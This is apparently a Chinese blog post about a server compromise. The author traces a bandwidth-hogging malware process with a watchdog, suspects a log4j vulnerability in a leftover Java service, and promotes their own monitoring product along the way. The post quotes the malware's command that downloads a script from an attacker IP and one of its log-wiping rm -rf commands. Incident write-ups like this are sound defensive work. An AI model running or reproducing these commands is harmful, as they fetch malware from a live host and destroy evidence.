记录一次线上被病毒攻击的事件

12 篇文章 0 订阅
5 篇文章 0 订阅

Abstract

本文记录了在产品中遇到的关于被黑客攻击的事件始末. 这里面会讲述到如何通过监控工具来帮助普通程序员与黑客进行"斗智斗勇"的故事.

被攻击

记录Pcap4j使用的一次异常调查和分析中我描述了如何对网络进行全方位的监控. 之所以有这个是因为某台生产服务器会被黑客经常进行攻击. 我们也尝试过用防火墙禁用某些ip或者端口,发现这个黑客也会时不时变更协议和ip 导致我们一直很烦恼这个事情. 这个攻击在某一段时间大量发送网络数据包 (峰值流量达到50MB/s). 监控如图:在这里插入图片描述
我们也收到了告警:
在这里插入图片描述

调查现场

1.发现进程

因为网络带宽被大量占用,导致ssh也很不稳定,时不时会出现掉线的情况.
先用top查看高占用可以进程, 尝试kill -1 (不用kill -9是因为我发现它会有watchdog进程会自动重启): 这个sdjd进程十分可疑:
在这里插入图片描述

2.临时恢复

为了能完整的结束掉进程, 使用ps -ef 列出所有包含该关键字的进程然后全部结束,结束后网络情况恢复.
在这里插入图片描述

3.根因调查

为了能够知道这个进程是谁启动的, 我查看了自己产品的日志, 我们的完全监控
下一代监控产品和服务
支持对启动进程的完全监控和日志查看. 这个病毒其实很隐蔽,会在启动后把所有日志文件删掉.`在这里插入图片描述
比如这样的一行

rm 3696944 3696856 0 /bin/rm -rf sdjdshdgdsdsfsfausjashsaggsafsfaa.sparc

代表执行了 rm -rf命令. 进程id是3696944, 父进程id是3696856. 通过这样不断的溯源,找到最开始的可以进程:
在这里插入图片描述
这个病毒通过进程2541799这个进程启动并且尝试用curl下载病毒脚本:
curl http://135.148.58.239:1980/aktualisieren.sh
该病毒会清除history和iptables
在这里插入图片描述
当我用ps -ef | grep 2541799发现这个进程竟然还在, 还是某个java进程:
在这里插入图片描述
想到这里突然想到会不是通过log4j的漏洞进行攻击了呢?之前升级过所有的模块. 可能这个是漏网之鱼, 从该进程日志中我发现有如下可疑的日志:
Invalid character found in method name
在这里插入图片描述
这个与log4j的漏洞非常相似. 可以参考这里
这里贴出的异常堆栈:

16:48:44.338 [http-nio-8080-exec-1] INFO  o.a.coyote.http11.Http11Processor - Error parsing HTTP request header
 Note: further occurrences of HTTP request parsing errors will be logged at DEBUG level.
java.lang.IllegalArgumentException: Invalid character found in method name [00x0c0x020x010x01`0x070x020x010x030x040x000x800x00...]. HTTP method names must be tokens
    at 

总结

  1. 监控产品对于系统运维人员是非常重要的. 有了它才能让我们在问题,事故发生时有迹可循. 我们的监控产品便对广度和深度上做了很好的平衡.
  2. 保持对常用开源软件的漏洞跟踪也很有必要.

参考链接

  1. 择维士监控官网
  2. log4j漏洞攻击展示
  3. 记录Pcap4j使用的一次异常调查和分析
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值